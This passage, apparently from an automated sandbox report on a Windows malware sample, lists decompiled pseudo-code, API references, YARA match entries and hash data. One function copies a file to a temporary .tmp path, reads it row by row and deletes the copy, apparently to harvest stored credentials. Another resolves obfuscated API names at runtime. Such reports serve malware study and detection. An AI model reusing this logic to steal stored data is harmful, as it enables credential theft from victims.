                                                                                                                                                                                          								_t22 = _t7;
                                                                                                                                                                                          								continue;
                                                                                                                                                                                          							}
                                                                                                                                                                                          							_t22 = CharNextA(_t22);
                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                          								_t9 =  *_t22;
                                                                                                                                                                                          								if(_t9 == 0 || _t9 == 0x22) {
                                                                                                                                                                                          									break;
                                                                                                                                                                                          								}
                                                                                                                                                                                          								_t11 = CharNextA(_t22);
                                                                                                                                                                                          								_t36 = _t36 + _t11 - _t22;
                                                                                                                                                                                          								_t22 = _t11;
                                                                                                                                                                                          							}
                                                                                                                                                                                          							if( *_t22 != 0) {
                                                                                                                                                                                          								_t22 = CharNextA(_t22);
                                                                                                                                                                                          							}
                                                                                                                                                                                          						}
                                                                                                                                                                                          						E00403AC0(_t34, _t36);
                                                                                                                                                                                          						_t23 = _t32;
                                                                                                                                                                                          						_t33 =  *_t34;
                                                                                                                                                                                          						_t35 = 0;
                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                          							_t14 =  *_t23;
                                                                                                                                                                                          							if(_t14 <= 0x20) {
                                                                                                                                                                                          								break;
                                                                                                                                                                                          							}
                                                                                                                                                                                          							if(_t14 != 0x22) {
                                                                                                                                                                                          								_t15 = CharNextA(_t23);
                                                                                                                                                                                          								if(_t15 <= _t23) {
                                                                                                                                                                                          									continue;
                                                                                                                                                                                          								} else {
                                                                                                                                                                                          									goto L27;
                                                                                                                                                                                          								}
                                                                                                                                                                                          								do {
                                                                                                                                                                                          									L27:
                                                                                                                                                                                          									 *((char*)(_t33 + _t35)) =  *_t23;
                                                                                                                                                                                          									_t23 =  &(_t23[1]);
                                                                                                                                                                                          									_t35 = _t35 + 1;
                                                                                                                                                                                          								} while (_t15 > _t23);
                                                                                                                                                                                          								continue;
                                                                                                                                                                                          							}
                                                                                                                                                                                          							_t23 = CharNextA(_t23);
                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                          								_t17 =  *_t23;
                                                                                                                                                                                          								if(_t17 == 0 || _t17 == 0x22) {
                                                                                                                                                                                          									break;
                                                                                                                                                                                          								}
                                                                                                                                                                                          								_t19 = CharNextA(_t23);
                                                                                                                                                                                          								if(_t19 <= _t23) {
                                                                                                                                                                                          									continue;
                                                                                                                                                                                          								} else {
                                                                                                                                                                                          									goto L21;
                                                                                                                                                                                          								}
                                                                                                                                                                                          								do {
                                                                                                                                                                                          									L21:
                                                                                                                                                                                          									 *((char*)(_t33 + _t35)) =  *_t23;
                                                                                                                                                                                          									_t23 =  &(_t23[1]);
                                                                                                                                                                                          									_t35 = _t35 + 1;
                                                                                                                                                                                          								} while (_t19 > _t23);
                                                                                                                                                                                          							}
                                                                                                                                                                                          							if( *_t23 != 0) {
                                                                                                                                                                                          								_t23 = CharNextA(_t23);
                                                                                                                                                                                          							}
                                                                                                                                                                                          						}
                                                                                                                                                                                          						return _t23;
                                                                                                                                                                                          					} else {
                                                                                                                                                                                          						_t22 =  &(_t22[2]);
                                                                                                                                                                                          						continue;
                                                                                                                                                                                          					}
                                                                                                                                                                                          				}
                                                                                                                                                                                          			}




















                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CharNextA.USER32(00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 0040269F
                                                                                                                                                                                          • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026A9
                                                                                                                                                                                          • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026C6
                                                                                                                                                                                          • CharNextA.USER32(00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026D0
                                                                                                                                                                                          • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026F9
                                                                                                                                                                                          • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402703
                                                                                                                                                                                          • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402727
                                                                                                                                                                                          • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402731
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharNext
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3213498283-0
                                                                                                                                                                                          • Opcode ID: b7f289542d20783a7460a3fa223e5cf14214bb8296ee11ce479d6e83d044995d
                                                                                                                                                                                          • Instruction ID: 5b28f76bfa796ab2381ca360e83c3cb8d2614de50686c14b6561fe7fc9f0b368
                                                                                                                                                                                          • Opcode Fuzzy Hash: b7f289542d20783a7460a3fa223e5cf14214bb8296ee11ce479d6e83d044995d
                                                                                                                                                                                          • Instruction Fuzzy Hash: B021E7546043951ADB31297A0AC877B6B894A5B304B68087BD0C1BB3D7D4FE4C8B832D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 45%
                                                                                                                                                                                          			E00410E70(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                          				char _v40;
                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                          				char _v48;
                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                          				char _v56;
                                                                                                                                                                                          				intOrPtr _v60;
                                                                                                                                                                                          				char _v64;
                                                                                                                                                                                          				char _v68;
                                                                                                                                                                                          				char _v72;
                                                                                                                                                                                          				char _v76;
                                                                                                                                                                                          				char _v80;
                                                                                                                                                                                          				char _v84;
                                                                                                                                                                                          				char _v88;
                                                                                                                                                                                          				char _v92;
                                                                                                                                                                                          				WCHAR* _t87;
                                                                                                                                                                                          				intOrPtr* _t102;
                                                                                                                                                                                          				intOrPtr _t104;
                                                                                                                                                                                          				intOrPtr* _t106;
                                                                                                                                                                                          				intOrPtr* _t110;
                                                                                                                                                                                          				intOrPtr* _t147;
                                                                                                                                                                                          				intOrPtr _t149;
                                                                                                                                                                                          				intOrPtr* _t151;
                                                                                                                                                                                          				void* _t153;
                                                                                                                                                                                          				intOrPtr* _t155;
                                                                                                                                                                                          				intOrPtr* _t159;
                                                                                                                                                                                          				void* _t161;
                                                                                                                                                                                          				intOrPtr* _t166;
                                                                                                                                                                                          				intOrPtr* _t172;
                                                                                                                                                                                          				intOrPtr* _t178;
                                                                                                                                                                                          				void* _t180;
                                                                                                                                                                                          				intOrPtr* _t184;
                                                                                                                                                                                          				void* _t187;
                                                                                                                                                                                          				intOrPtr _t208;
                                                                                                                                                                                          				intOrPtr _t210;
                                                                                                                                                                                          				void* _t216;
                                                                                                                                                                                          				intOrPtr _t222;
                                                                                                                                                                                          				intOrPtr _t226;
                                                                                                                                                                                          				intOrPtr _t227;
                                                                                                                                                                                          				void* _t228;
                                                                                                                                                                                          				void* _t229;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t224 = __esi;
                                                                                                                                                                                          				_t186 = __ebx;
                                                                                                                                                                                          				_t226 = _t227;
                                                                                                                                                                                          				_t187 = 0xb;
                                                                                                                                                                                          				do {
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_t187 = _t187 - 1;
                                                                                                                                                                                          					_t234 = _t187;
                                                                                                                                                                                          				} while (_t187 != 0);
                                                                                                                                                                                          				_push(__ebx);
                                                                                                                                                                                          				_push(__esi);
                                                                                                                                                                                          				_push(__edi);
                                                                                                                                                                                          				_v12 = __edx;
                                                                                                                                                                                          				_v8 = __eax;
                                                                                                                                                                                          				E004040F4( &_v8);
                                                                                                                                                                                          				_push(_t226);
                                                                                                                                                                                          				_push(0x411163);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t227;
                                                                                                                                                                                          				E00403B80( &_v28);
                                                                                                                                                                                          				_push(_t226);
                                                                                                                                                                                          				_push(0x4110ce);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t227;
                                                                                                                                                                                          				E00406FDC(GetTickCount(), __ebx,  &_v52, __esi, _t234);
                                                                                                                                                                                          				_push(_v52);
                                                                                                                                                                                          				E00406F1C( &_v56, __ebx, __edi, __esi, _t234);
                                                                                                                                                                                          				_push(_v56);
                                                                                                                                                                                          				_push(L".tmp");
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				E0040781C(_v8, _t186,  &_v40, _t234);
                                                                                                                                                                                          				E004062D8(L"%TEMP%",  &_v64, _t234);
                                                                                                                                                                                          				_push(_v64);
                                                                                                                                                                                          				_push(0x41119c);
                                                                                                                                                                                          				_push(_v32);
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				E0040781C(_v60, _t186,  &_v44, _t234);
                                                                                                                                                                                          				_t87 = E00403D3C(_v44);
                                                                                                                                                                                          				CopyFileW(E00403D3C(_v40), _t87, 0xffffffff);
                                                                                                                                                                                          				E0040377C( &_v68, _v44);
                                                                                                                                                                                          				E00404AFC(_v68, _t186, _t187,  &_v36, _t224, _t234);
                                                                                                                                                                                          				E00403D2C( &_v72, _v36);
                                                                                                                                                                                          				if(E004076B0(_v72, _t186, _t187) != 0) {
                                                                                                                                                                                          					_t102 =  *0x41b55c; // 0x41c784
                                                                                                                                                                                          					_t104 =  *((intOrPtr*)( *_t102))(E00403990(_v36),  &_v16);
                                                                                                                                                                                          					_t228 = _t227 + 8;
                                                                                                                                                                                          					__eflags = _t104;
                                                                                                                                                                                          					if(_t104 == 0) {
                                                                                                                                                                                          						E00408120(0x66,  &_v76);
                                                                                                                                                                                          						_t147 =  *0x41b5cc; // 0x41c78c
                                                                                                                                                                                          						_t149 =  *((intOrPtr*)( *_t147))(_v16, E00403990(_v76), 0xffffffff,  &_v20,  &_v24);
                                                                                                                                                                                          						_t229 = _t228 + 0x14;
                                                                                                                                                                                          						__eflags = _t149;
                                                                                                                                                                                          						if(_t149 == 0) {
                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                          								_t151 =  *0x41b600; // 0x41c790
                                                                                                                                                                                          								_t153 =  *((intOrPtr*)( *_t151))(_v20);
                                                                                                                                                                                          								__eflags = _t153 - 0x64;
                                                                                                                                                                                          								if(_t153 != 0x64) {
                                                                                                                                                                                          									goto L9;
                                                                                                                                                                                          								}
                                                                                                                                                                                          								_t155 =  *0x41b644; // 0x41c798
                                                                                                                                                                                          								_t159 =  *0x41b588; // 0x41c794
                                                                                                                                                                                          								_t161 =  *((intOrPtr*)( *_t159))(_v20, 3,  *((intOrPtr*)( *_t155))(_v20, 3));
                                                                                                                                                                                          								_pop(_t216);
                                                                                                                                                                                          								E004094C4(_t161,  &_v48, _t216);
                                                                                                                                                                                          								E00403D2C( &_v80, _v48);
                                                                                                                                                                                          								_t166 =  *0x41b588; // 0x41c794
                                                                                                                                                                                          								E00403C98( &_v84,  *((intOrPtr*)( *_t166))(_v20, 0, 0x4111a4, _v80, _v28));
                                                                                                                                                                                          								_t172 =  *0x41b588; // 0x41c794
                                                                                                                                                                                          								E00403C98( &_v88,  *((intOrPtr*)( *_t172))(_v20, 1, 0x4111a4, _v84));
                                                                                                                                                                                          								_t178 =  *0x41b588; // 0x41c794
                                                                                                                                                                                          								_t180 =  *((intOrPtr*)( *_t178))(_v20, 2, 0x4111b0, _v88);
                                                                                                                                                                                          								_t229 = _t229 + 0x28;
                                                                                                                                                                                          								E00403C98( &_v92, _t180);
                                                                                                                                                                                          								_push(_v92);
                                                                                                                                                                                          								_push(L"\r\n\r\n");
                                                                                                                                                                                          								E00403E1C();
                                                                                                                                                                                          								_t184 =  *0x41b584; // 0x41b0b4
                                                                                                                                                                                          								 *_t184 =  *_t184 + 1;
                                                                                                                                                                                          								__eflags =  *_t184;
                                                                                                                                                                                          							}
                                                                                                                                                                                          						}
                                                                                                                                                                                          					}
                                                                                                                                                                                          					L9:
                                                                                                                                                                                          					_t106 =  *0x41b654; // 0x41c79c
                                                                                                                                                                                          					 *((intOrPtr*)( *_t106))(_v20);
                                                                                                                                                                                          					_t110 =  *0x41b590; // 0x41c788
                                                                                                                                                                                          					 *((intOrPtr*)( *_t110))(_v16);
                                                                                                                                                                                          					_pop(_t208);
                                                                                                                                                                                          					 *[fs:eax] = _t208;
                                                                                                                                                                                          					E00403BBC(_v12, _v28);
                                                                                                                                                                                          					DeleteFileW(E00403D3C(_v44));
                                                                                                                                                                                          				} else {
                                                                                                                                                                                          					_pop(_t222);
                                                                                                                                                                                          					 *[fs:eax] = _t222;
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_pop(_t210);
                                                                                                                                                                                          				 *[fs:eax] = _t210;
                                                                                                                                                                                          				_push(E0041116A);
                                                                                                                                                                                          				E00403B98( &_v92, 4);
                                                                                                                                                                                          				E004034E4( &_v76);
                                                                                                                                                                                          				E00403B80( &_v72);
                                                                                                                                                                                          				E004034E4( &_v68);
                                                                                                                                                                                          				E00403B98( &_v64, 4);
                                                                                                                                                                                          				E004034E4( &_v48);
                                                                                                                                                                                          				E00403B98( &_v44, 2);
                                                                                                                                                                                          				E004034E4( &_v36);
                                                                                                                                                                                          				E00403B98( &_v32, 2);
                                                                                                                                                                                          				return E00403B80( &_v8);
                                                                                                                                                                                          			}

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00410EB4
                                                                                                                                                                                          • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
                                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000), ref: 004110EC
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CopyCountDeleteTick
                                                                                                                                                                                          • String ID: $%TEMP%$.tmp
                                                                                                                                                                                          • API String ID: 2381671008-2792595090
                                                                                                                                                                                          • Opcode ID: 25513a2d6d90f056bd5cf02fe9c1dff5265798498166ca8350b0b3102dd1fa50
                                                                                                                                                                                          • Instruction ID: ef1d9ef4a41f0d536355ae74e23377fcfc6b42a5aa152db35adc264ec6821d93
                                                                                                                                                                                          • Opcode Fuzzy Hash: 25513a2d6d90f056bd5cf02fe9c1dff5265798498166ca8350b0b3102dd1fa50
                                                                                                                                                                                          • Instruction Fuzzy Hash: 55910B31A40109AFDB00EB95DC82EDEBBB9EF48315F104436F514F72A2DB78AE458B58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 49%
                                                                                                                                                                                          			E0040B15C(void* __ebx, void* __edi, void* __esi) {
                                                                                                                                                                                          				_Unknown_base(*)()* _v8;
                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                          				char _v68;
                                                                                                                                                                                          				char _v72;
                                                                                                                                                                                          				char _v76;
                                                                                                                                                                                          				char _v80;
                                                                                                                                                                                          				char _v84;
                                                                                                                                                                                          				char _v88;
                                                                                                                                                                                          				char _v92;
                                                                                                                                                                                          				char _v96;
                                                                                                                                                                                          				char _v100;
                                                                                                                                                                                          				char _v104;
                                                                                                                                                                                          				CHAR* _t72;
                                                                                                                                                                                          				_Unknown_base(*)()* _t111;
                                                                                                                                                                                          				intOrPtr* _t157;
                                                                                                                                                                                          				struct HINSTANCE__* _t158;
                                                                                                                                                                                          				signed int _t159;
                                                                                                                                                                                          				void* _t160;
                                                                                                                                                                                          				intOrPtr _t170;
                                                                                                                                                                                          				intOrPtr _t175;
                                                                                                                                                                                          				intOrPtr _t179;
                                                                                                                                                                                          				intOrPtr* _t192;
                                                                                                                                                                                          				void* _t194;
                                                                                                                                                                                          				void* _t195;
                                                                                                                                                                                          				signed int _t200;
                                                                                                                                                                                          				intOrPtr _t202;
                                                                                                                                                                                          				intOrPtr _t203;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t202 = _t203;
                                                                                                                                                                                          				_t160 = 0xc;
                                                                                                                                                                                          				do {
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_t160 = _t160 - 1;
                                                                                                                                                                                          				} while (_t160 != 0);
                                                                                                                                                                                          				 *[fs:eax] = _t203;
                                                                                                                                                                                          				E00408120(0x9b,  &_v72);
                                                                                                                                                                                          				_t72 = E00403990(_v72);
                                                                                                                                                                                          				E00408120(0x9a,  &_v76);
                                                                                                                                                                                          				_t157 = GetProcAddress(LoadLibraryA(E00403990(_v76)), _t72);
                                                                                                                                                                                          				E0040813C(0x9c,  &_v80);
                                                                                                                                                                                          				 *_t157(E00403D3C(_v80),  &_v52,  *[fs:eax], 0x40b3c3, _t202, __edi, __esi, __ebx, _t160);
                                                                                                                                                                                          				E0040813C(0x9d,  &_v84);
                                                                                                                                                                                          				 *_t157(E00403D3C(_v84),  &_v68);
                                                                                                                                                                                          				E00408120(0x9e,  &_v88);
                                                                                                                                                                                          				_t158 = LoadLibraryA(E00403990(_v88));
                                                                                                                                                                                          				if(_t158 != 0) {
                                                                                                                                                                                          					E00408120(0x9f,  &_v92);
                                                                                                                                                                                          					_t111 = GetProcAddress(_t158, E00403990(_v92));
                                                                                                                                                                                          					E00408120(0xa0,  &_v96);
                                                                                                                                                                                          					_t192 = GetProcAddress(_t158, E00403990(_v96));
                                                                                                                                                                                          					E00408120(0xa1,  &_v100);
                                                                                                                                                                                          					_v8 = GetProcAddress(_t158, E00403990(_v100));
                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                          					_push( &_v16);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push( &_v52);
                                                                                                                                                                                          					if( *_t111() == 0) {
                                                                                                                                                                                          						_push( &_v20);
                                                                                                                                                                                          						_push( &_v12);
                                                                                                                                                                                          						_push(0x200);
                                                                                                                                                                                          						_push(_v16);
                                                                                                                                                                                          						if( *_t192() == 0) {
                                                                                                                                                                                          							_t194 = _v12 - 1;
                                                                                                                                                                                          							if(_t194 >= 0) {
                                                                                                                                                                                          								_t195 = _t194 + 1;
                                                                                                                                                                                          								_t159 = 0;
                                                                                                                                                                                          								do {
                                                                                                                                                                                          									_t179 =  *0x40b130; // 0x40b134
                                                                                                                                                                                          									E004047B4( &_v24, _t179);
                                                                                                                                                                                          									_push( &_v24);
                                                                                                                                                                                          									_push(0);
                                                                                                                                                                                          									_push(0);
                                                                                                                                                                                          									_push(0);
                                                                                                                                                                                          									_t200 = (_t159 << 3) - _t159;
                                                                                                                                                                                          									_push( *((intOrPtr*)(_v20 + 0x18 + _t200 * 8)));
                                                                                                                                                                                          									_push( *((intOrPtr*)(_v20 + 0x14 + _t200 * 8)));
                                                                                                                                                                                          									_push( &_v68);
                                                                                                                                                                                          									_push(_v16);
                                                                                                                                                                                          									if(_v8() == 0) {
                                                                                                                                                                                          										E0040370C( &_v28,  *((intOrPtr*)( *((intOrPtr*)(_v20 + 0x14 + _t200 * 8)) + 0x10)));
                                                                                                                                                                                          										E0040370C( &_v32,  *((intOrPtr*)( *((intOrPtr*)(_v20 + 0x18 + _t200 * 8)) + 0x10)));
                                                                                                                                                                                          										E0040370C( &_v36,  *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x1c)) + 0x10)));
                                                                                                                                                                                          										if(E00403790(_v28) != 0 && E00403790(_v36) != 0) {
                                                                                                                                                                                          											E00408120(0xa2,  &_v104);
                                                                                                                                                                                          											E00405210(0x40b3e8, _t159, _v28, _v104, _t195, _t200, 0x40b3dc, _v36, _v32);
                                                                                                                                                                                          										}
                                                                                                                                                                                          									}
                                                                                                                                                                                          									_t159 = _t159 + 1;
                                                                                                                                                                                          									_t195 = _t195 - 1;
                                                                                                                                                                                          								} while (_t195 != 0);
                                                                                                                                                                                          							}
                                                                                                                                                                                          						}
                                                                                                                                                                                          					}
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_pop(_t170);
                                                                                                                                                                                          				 *[fs:eax] = _t170;
                                                                                                                                                                                          				_push(E0040B3CA);
                                                                                                                                                                                          				E00403508( &_v104, 5);
                                                                                                                                                                                          				E00403B98( &_v84, 2);
                                                                                                                                                                                          				E00403508( &_v76, 2);
                                                                                                                                                                                          				E00403508( &_v36, 3);
                                                                                                                                                                                          				_t175 =  *0x40b130; // 0x40b134
                                                                                                                                                                                          				return E00404224( &_v24, 2, _t175);
                                                                                                                                                                                          			}





































                                                                                                                                                                                          0x0040b376
                                                                                                                                                                                          0x0040b383
                                                                                                                                                                                          0x0040b390
                                                                                                                                                                                          0x0040b39d
                                                                                                                                                                                          0x0040b3aa
                                                                                                                                                                                          0x0040b3b2
                                                                                                                                                                                          0x0040b3c2

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(00000000,00000000,00000000,0040B3C3,?,00000000,0041B0FC,00000000,0000000B,00000000,00000000,?,0040B405,00000000,0040B40F), ref: 0040B1A9
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B1AF
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(00000000,?,00000000,0041B0FC,00000000,0000000B,00000000,00000000,?,0040B405,00000000,0040B40F,?,00000000,0041B0FC,00000000), ref: 0040B204
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B22A
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B248
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040B266
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2238633743-0
                                                                                                                                                                                          • Opcode ID: 695678cf7ca45a9e7c8b3b2878ade717b4a60ccd5b1908c8415a47cf5bea5569
                                                                                                                                                                                          • Instruction ID: 364380f0d352aef1bf1129e1f4ec87a81fdd7fa01391a9152c5138518fa9ee90
                                                                                                                                                                                          • Opcode Fuzzy Hash: 695678cf7ca45a9e7c8b3b2878ade717b4a60ccd5b1908c8415a47cf5bea5569
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5761E375A002099BDB01EBE5C985E9EB7BDFF44304F50453AB900FB385DA78EE0587A8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                                          			E00401934() {
                                                                                                                                                                                          				void* _t2;
                                                                                                                                                                                          				void* _t3;
                                                                                                                                                                                          				void* _t14;
                                                                                                                                                                                          				intOrPtr* _t19;
                                                                                                                                                                                          				intOrPtr _t23;
                                                                                                                                                                                          				intOrPtr _t26;
                                                                                                                                                                                          				intOrPtr _t28;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t26 = _t28;
                                                                                                                                                                                          				if( *0x41c5ac == 0) {
                                                                                                                                                                                          					return _t2;
                                                                                                                                                                                          				} else {
                                                                                                                                                                                          					_push(_t26);
                                                                                                                                                                                          					_push(E00401A0A);
                                                                                                                                                                                          					_push( *[fs:edx]);
                                                                                                                                                                                          					 *[fs:edx] = _t28;
                                                                                                                                                                                          					if( *0x41c035 != 0) {
                                                                                                                                                                                          						_push(0x41c5b4);
                                                                                                                                                                                          						L004011CC();
                                                                                                                                                                                          					}
                                                                                                                                                                                          					 *0x41c5ac = 0;
                                                                                                                                                                                          					_t3 =  *0x41c60c; // 0x0
                                                                                                                                                                                          					LocalFree(_t3);
                                                                                                                                                                                          					 *0x41c60c = 0;
                                                                                                                                                                                          					_t19 =  *0x41c5d4; // 0x41c5d4
                                                                                                                                                                                          					while(_t19 != 0x41c5d4) {
                                                                                                                                                                                          						_t1 = _t19 + 8; // 0x0
                                                                                                                                                                                          						VirtualFree( *_t1, 0, 0x8000);
                                                                                                                                                                                          						_t19 =  *_t19;
                                                                                                                                                                                          					}
                                                                                                                                                                                          					E00401234(0x41c5d4);
                                                                                                                                                                                          					E00401234(0x41c5e4);
                                                                                                                                                                                          					E00401234(0x41c610);
                                                                                                                                                                                          					_t14 =  *0x41c5cc; // 0x0
                                                                                                                                                                                          					while(_t14 != 0) {
                                                                                                                                                                                          						 *0x41c5cc =  *_t14;
                                                                                                                                                                                          						LocalFree(_t14);
                                                                                                                                                                                          						_t14 =  *0x41c5cc; // 0x0
                                                                                                                                                                                          					}
                                                                                                                                                                                          					_pop(_t23);
                                                                                                                                                                                          					 *[fs:eax] = _t23;
                                                                                                                                                                                          					_push(0x401a11);
                                                                                                                                                                                          					if( *0x41c035 != 0) {
                                                                                                                                                                                          						_push(0x41c5b4);
                                                                                                                                                                                          						L004011D4();
                                                                                                                                                                                          					}
                                                                                                                                                                                          					_push(0x41c5b4);
                                                                                                                                                                                          					L004011DC();
                                                                                                                                                                                          					return 0;
                                                                                                                                                                                          				}
                                                                                                                                                                                          			}











                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,00401A0A), ref: 00401961
                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,00000000,00401A0A), ref: 00401973
                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401A0A), ref: 00401992
                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401A0A), ref: 004019D1
                                                                                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0041C5B4,00401A11,00000000,00000000,00401A0A), ref: 004019FA
                                                                                                                                                                                          • RtlDeleteCriticalSection.KERNEL32(0041C5B4,00401A11,00000000,00000000,00401A0A), ref: 00401A04
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3782394904-0
                                                                                                                                                                                          • Opcode ID: a533093bf643e2750fc0c7fb6ce1a8cee2193e72f340cc35e9b9a59fd34ff9a9
                                                                                                                                                                                          • Instruction ID: f5b3729ab89c308c15893b8da70c4d7314be5901088e834fcff69d5c90a64892
                                                                                                                                                                                          • Opcode Fuzzy Hash: a533093bf643e2750fc0c7fb6ce1a8cee2193e72f340cc35e9b9a59fd34ff9a9
                                                                                                                                                                                          • Instruction Fuzzy Hash: F11193B17843907ED715AB669CD1B927B969745708F50807BF100BA2F1C73DA840CF5D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 46%
                                                                                                                                                                                          			E00410BB8(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                          				char _v40;
                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                          				char _v48;
                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                          				char _v60;
                                                                                                                                                                                          				char _v64;
                                                                                                                                                                                          				char _v68;
                                                                                                                                                                                          				char _v72;
                                                                                                                                                                                          				char _v76;
                                                                                                                                                                                          				char _v80;
                                                                                                                                                                                          				WCHAR* _t76;
                                                                                                                                                                                          				intOrPtr* _t91;
                                                                                                                                                                                          				void* _t93;
                                                                                                                                                                                          				intOrPtr* _t95;
                                                                                                                                                                                          				intOrPtr* _t99;
                                                                                                                                                                                          				intOrPtr* _t132;
                                                                                                                                                                                          				void* _t134;
                                                                                                                                                                                          				intOrPtr* _t136;
                                                                                                                                                                                          				void* _t138;
                                                                                                                                                                                          				intOrPtr* _t140;
                                                                                                                                                                                          				intOrPtr* _t146;
                                                                                                                                                                                          				void* _t148;
                                                                                                                                                                                          				void* _t154;
                                                                                                                                                                                          				intOrPtr _t174;
                                                                                                                                                                                          				intOrPtr _t176;
                                                                                                                                                                                          				intOrPtr _t184;
                                                                                                                                                                                          				intOrPtr _t188;
